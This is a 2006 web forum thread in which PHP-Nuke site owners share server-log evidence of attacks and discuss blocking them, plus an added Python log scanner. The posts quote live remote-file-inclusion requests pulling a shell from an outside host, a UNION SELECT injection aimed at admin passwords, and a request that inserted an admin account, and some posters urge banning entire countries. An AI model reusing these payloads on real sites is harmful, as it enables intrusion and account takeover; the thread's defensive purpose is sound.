| Author |
Message |
MarkyBear Hangin' Around

Joined: Mar 27, 2005 Posts: 39
|
Posted:
Wed Feb 15, 2006 9:53 pm |
|
Someone in Turkey is attempting to hack my site; luckily I am patched up, have extra site protection, and whoever the hacker is, is using hacks for PostNuke and XOOPS CMS, which I don't run!
Latest from my error logs:
| Code: | [Tue Feb 14 05:01:14 2006] [error] [client 81.214.167.116] File does not exist: /home/xxxxxxxxxx/public_html/modules/PNphpBB2/includes/functions_admin.php
[Tue Feb 14 13:39:19 2006] [error] [client 81.215.237.159] File does not exist: /home/xxxxxxxxxx/public_html/modules/4nAlbum/public/displayCategory.php
[Wed Feb 15 18:16:52 2006] [error] [client 85.98.60.174] File does not exist: /home/xxxxxxxxxx/public_html/modules/My_eGallery/public/displayCategory.php |
Here are the links they were using:
| Code: | /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://aviozone.com/tool25.dat?&list=1&cmd=id
/modules/My_eGallery/public/displayCategory.php?basepath=http://aviozone.com/tool25.dat?&list=1&cmd=id |
I went to the but all 'contact us' links bring me to fake email addys.
But if you copy-paste this link into your browser, you can DL and open in Notepad the tool they're trying to use, and it definitely is a defacing tool:
| Code: | | http://aviozone.com/tool25.dat?&list=1&cmd=id |
I've banned a few different IP addys so far and three different ranges but they keep coming back, here's what I have banned so far:
81.214.167.116
81.214.160.0 - 81.214.175.255
81.215.232.0 - 81.215.239.255
81.214.169.117
85.98.60.174
85.98.48.0 - 85.98.63.255
What should I do? I'm tempted to block the entire country next! |
|
|
|
 |
Dawg RavenNuke(tm) Development Team

Joined: Nov 07, 2003 Posts: 889
|
Posted:
Wed Feb 15, 2006 10:02 pm |
|
Ban the entire country!! Ban'em All!
I don't know what part of the world you are in or what your site is about but I have most of the world banned from my site.
If nothing else...Ban it for the next week....they will move on to someone else!
Dawg |
|
|
|
 |
MarkyBear Hangin' Around

Joined: Mar 27, 2005 Posts: 39
|
Posted:
Wed Feb 15, 2006 10:07 pm |
|
| Dawg wrote: | Ban the entire country!! Ban'em All!
I don't know what part of the world you are in or what your site is about but I have most of the world banned from my site.
If nothing else...Ban it for the next week....they will move on to someone else!
Dawg |
LMAO, I LIKE IT!!!
They started this back in December, there would be an attempt every other week or so, but now it's every day...
I'm in the USA and have your everyday chat site for sports fans, so I'd have no problem banning the entire country, can that be done in Sentinel??? If not, where do I get the ranges? |
|
|
|
 |
Dawg RavenNuke(tm) Development Team

Joined: Nov 07, 2003 Posts: 889
|
Posted:
Wed Feb 15, 2006 10:59 pm |
|
Did you install the Ip to Country tables when you installed NS?
If not what version are you running?
Dawg |
|
|
|
 |
MarkyBear Hangin' Around

Joined: Mar 27, 2005 Posts: 39
|
Posted:
Wed Feb 15, 2006 11:25 pm |
|
| Dawg wrote: | Did you install the Ip to Country tables when you installed NS?
If not what version are you running?
Dawg |
Actually I just updated the IP2Countries in NS and saw that the number of pages for Turkey has dropped from 11 to 6...
I guess I just go on down the line and click 'block' for each range on all pages then??? |
|
|
|
 |
evaders99 Former Moderator in Good Standing

Joined: Apr 30, 2004 Posts: 3221
|
Posted:
Wed Feb 15, 2006 11:34 pm |
|
The problem with Turkey is that they are all on dynamic DSL lines now. You ban one IP, they just get another. And banning ranges only works sometimes... each ISP seems to report small ranges that aren't contiguous.
I keep getting referral spam from "bwdow.com" - it autobans the IP but they keep coming
I think I may just go and ban Turkey anyway |
|
|
|
 |
MarkyBear Hangin' Around

Joined: Mar 27, 2005 Posts: 39
|
Posted:
Wed Feb 15, 2006 11:53 pm |
|
That's what I'm going to do, Iran too. They've given me some problems before from some school, and when I emailed the admin, he demanded to see all my log files in their entirety before he did anything; needless to say I didn't! |
|
|
|
 |
Susann Moderator

Joined: Dec 19, 2004 Posts: 3143 Location: Germany:Moderator German NukeSentinel Support
|
Posted:
Thu Feb 16, 2006 5:49 am |
|
It's that same tool I spoke of:
It's been present since the middle of December and there are different versions available. |
|
|
|
 |
MarkyBear Hangin' Around

Joined: Mar 27, 2005 Posts: 39
|
Posted:
Thu Feb 16, 2006 6:12 am |
|
Yep, it was the middle-end of December that I first noticed this in my error logs...
The site that the tool is hosted on, is poweb I believe, I'll check for sure and then contact them too...
Took awhile, but Turkey has been banned from site now, I'll keep my eyes open for any more of these...
Thanks everyone for their help and hopefully this doesn't get worse for all! |
|
|
|
 |
hitwalker Sells PC To Pay For Divorce

Joined: Posts: 5661
|
Posted:
Thu Feb 16, 2006 6:39 am |
|
Well, I have about 20 banned countries.
Why?....because they enjoy hacking sites, or at least try to.
And if you have a site that makes money somehow, those countries will never bring in a penny, so you won't miss a thing.... |
|
|
|
 |
MarkyBear Hangin' Around

Joined: Mar 27, 2005 Posts: 39
|
Posted:
Thu Feb 16, 2006 8:37 am |
|
Ya know, if there was an easier way to just ban a whole country I'd probably be up there too!
But this will make you all laugh, Union attack was just blocked by NS, here is the link they tried:
| Code: | | xtremezone.us/modules.php?name=Search&type=comments&query=not123exists&instory=/**UNION**/ SELECT/**0,0,pwd,0,aid**FROM**/nuke_authors |
The funny part is, look at what link referred them to my site, it was a Google search of: 'this site is protected by nukesentinel'
| Code: | | http://www.google.com/search?q=this+site+is+protected+by++nukesentinel&hl=en&lr=&start=10&sa=N |
I hope they enjoyed those PC-Killer templates too!  |
|
|
|
 |
viper155 Regular


Joined: Feb 18, 2006 Posts: 99
|
Posted:
Sat Feb 18, 2006 12:46 pm |
|
Hey, I've gotten hacked 2 times in the last 2 days... I looked through my access logs and found this link....
| Code: | | http://*******.com//modules/coppermine/themes/default/theme.php?THEME_DIR=http%3A%2F%2Faviozone.com%2Fshell.dat%3F&act=sql&sql_login=*dbnamewashere*&sql_passwd=*password*&sql_server=localhost&sql_port=3306&sql_db=*DBname*&sql_tbl_act=insert&sql_tbl=nuke_authors&sql_tbl_ls=0&sql_tbl_le=30&sql_tbl_insert_q=+%60aid%60+%3D+%27Viper%27+AND+%60name%60+%3D+%27God%27+AND+%60url%60+%3D+%27http%3A%2F%2Ft*mydomainname*%27+AND+%60email% |
The things with * around them were my real info they got.
and here is the DIR site url its using
| Code: | | http://aviozone.com/shell.dat?&act=about |
I removed coppermine and also found a file in the coppermine album folder that was called training.bmp, but it was actually somehow a folder and not an image.. I opened it and it seemed like some scripts he probably uploaded through coppermine.
This IP was also from Turkey and here it is for you to add to the ban list.
81.214.172.158 |
|
|
|
 |
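Added example (not from any poster or from NukeSentinel): a small Python scan of Apache access-log lines for the two request patterns quoted in this thread, a script parameter whose value is a remote URL (`basepath=`, `GALLERY_BASEDIR=`, `THEME_DIR=`) and a comment-padded `UNION SELECT`. The log lines, client IPs and the `attacker.example` host are constructed; `classify`, `scan` and `needs_triage` are names chosen here.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Constructed sample lines in Apache "combined" format (documentation IPs, placeholder host).
SAMPLE_LOG = """\
203.0.113.7 - - [15/Feb/2006:18:16:52 -0500] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://attacker.example/tool.dat?&list=1&cmd=id HTTP/1.1" 404 312 "-" "-"
203.0.113.7 - - [15/Feb/2006:18:16:55 -0500] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http%3A%2F%2Fattacker.example%2Fshell.dat%3F&act=sql HTTP/1.1" 200 5120 "-" "-"
198.51.100.9 - - [16/Feb/2006:08:30:01 -0500] "GET /modules.php?name=Search&type=comments&query=x&instory=/**UNION**/%20SELECT/**0,0,pwd,0,aid**FROM**/nuke_authors HTTP/1.1" 200 901 "-" "-"
192.0.2.44 - - [16/Feb/2006:09:00:00 -0500] "GET /modules.php?name=Web_Links&url=home HTTP/1.1" 200 4410 "-" "-"
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3}) ')
REMOTE_RE = re.compile(r"^(?:https?|ftp)://", re.I)

def classify(target):
    """Return the set of findings for one request target (path plus query string)."""
    # partition() instead of urlsplit(): a path starting with "//" must not become a host.
    _, _, query = target.partition("?")
    findings = set()
    for name, value in parse_qsl(query, keep_blank_values=True):  # percent-decodes values
        if REMOTE_RE.match(value.strip()):
            findings.add(f"remote-include:{name}")
        # Collapse comment markers and punctuation so /**UNION**/ SELECT still matches.
        if "union select" in re.sub(r"[^a-z0-9]+", " ", value.lower()):
            findings.add(f"sql-union:{name}")
    return findings

def scan(log_text):
    """Map client IP -> list of (status, findings) for every flagged request."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, target, status = m.group(1), m.group(2), int(m.group(3))
        findings = classify(target)
        if findings:
            hits[client].append((status, sorted(findings)))
    return dict(hits)

def needs_triage(hits):
    """Clients with a flagged request that was not a 404, i.e. the targeted script exists."""
    return sorted(c for c, reqs in hits.items() if any(s != 404 for s, _ in reqs))

if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    print(found, needs_triage(found))
```

A flagged request answered with 404 matches the "File does not exist" entries in the first post; one answered with any other status hit a script that is actually installed, as with the coppermine theme.php request above, and is the one to investigate first.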
viper155 Regular


Joined: Feb 18, 2006 Posts: 99
|
Posted:
Sat Feb 18, 2006 2:37 pm |
|
Oh, just found this.. here are the Turkish hackers.. they keep score
|
|
|
|
 |
hitwalker Sells PC To Pay For Divorce

Joined: Posts: 5661
|
Posted:
Sat Feb 18, 2006 2:52 pm |
|
Nice find but also old news, and I know about aviozone.
They are just a victim in this...and I mailed the host this morning...
If you wanna complain, send email to sa-abuse(at)powweb.com
Just ban Turkey.
And rename your coppermine... |
|
|
|
 |
viper155 Regular


Joined: Feb 18, 2006 Posts: 99
|
Posted:
Sat Feb 18, 2006 3:06 pm |
|
Do you think by me removing coppermine I might have a chance to not get hacked tonight... He does it around 7pm EST every night for the last 2 days |
|
|
|
 |
hitwalker Sells PC To Pay For Divorce

Joined: Posts: 5661
|
Posted:
Sat Feb 18, 2006 3:25 pm |
|
Well, make sure you are secured; if so, don't allow any privileges to upload, then in your coppermine config change your coppermine name to bloodyhell, or marrs, or belinda carlisle...whatever...
these attacks are mostly by remote...
ever seen a coppermine named president ? |
|
|
|
 |
MarkyBear Hangin' Around

Joined: Mar 27, 2005 Posts: 39
|
Posted:
Sat Feb 18, 2006 4:28 pm |
|
viper155, sorry about that happening, and that's around the same time it was tried by my site too...
I just banned all of Turkey...
My hosting tech support suggested I use mod-rewrite for that tool name to redirect it. I'd like to do this, to the PC-Killers, but how would I go about that!? |
|
|
|
 |
hitwalker Sells PC To Pay For Divorce

Joined: Posts: 5661
|
Posted:
Sat Feb 18, 2006 5:28 pm |
|
How about what ?
The templates..? |
|
|
|
 |
MarkyBear Hangin' Around

Joined: Mar 27, 2005 Posts: 39
|
Posted:
Sat Feb 18, 2006 6:12 pm |
|
| hitwalker wrote: | How about what ?
The templates..? |
A way to redirect any link with:
| Code: | | tool25.dat?&list=1&cmd=id |
in it or maybe even just the 'tool.dat' part or whatever, but anytime there is a link with that in it, have that link redirected to one of the PC-Killer templates for NS. |
|
|
|
 |
hitwalker Sells PC To Pay For Divorce

Joined: Posts: 5661
|
Posted:
Sat Feb 18, 2006 6:19 pm |
|
That won't work that way and it's not easy.
With Sentinel you don't need that really.
The code they use is basically hosted on another site.
They also don't work, cause I've seen them all by now.
But as a temporary solution you could add to your htaccess
Redirect /whateverabusesive
the is the address you gonna send to.
keep the space between whateverabusesive and |
|
|
|
 |
viper155 Regular


Joined: Feb 18, 2006 Posts: 99
|
Posted:
Sun Feb 19, 2006 7:40 am |
|
Anyone know why when I go to the download section and click NukeSentinel my browser gets an error and has to close..
I wanna install that for my site
I'm using IE |
|
|
|
 |
hitwalker Sells PC To Pay For Divorce

Joined: Posts: 5661
|
Posted:
Sun Feb 19, 2006 8:16 am |
|
i think raven is testing the downloads......lol
go to and download it there .. |
|
|
|
 |
viper155 Regular


Joined: Feb 18, 2006 Posts: 99
|
Posted:
Sun Feb 19, 2006 8:18 am |
|
Ok, my php-nuke has a lot of edited files for modules such as nuke royal etc... Does anyone install this module for money?
thanks |
|
|
|
 |
hitwalker Sells PC To Pay For Divorce

Joined: Posts: 5661
|
Posted:
Sun Feb 19, 2006 8:20 am |
|
on what patched nuke version are you? |
|
|
|
 |
viper155 Regular


Joined: Feb 18, 2006 Posts: 99
|
Posted:
Sun Feb 19, 2006 8:29 am |
|
I can't say for sure that I'm even on a patched version... I'm running phpnuke 7.6
I was away from the internet for a few months and now that I've come back I have kinda forgotten everything I've done to the files... My guess is that I will need the patches and NukeSentinel added...
I am willing to pay for this to secure my site |
|
|
|
 |
|
|
|
|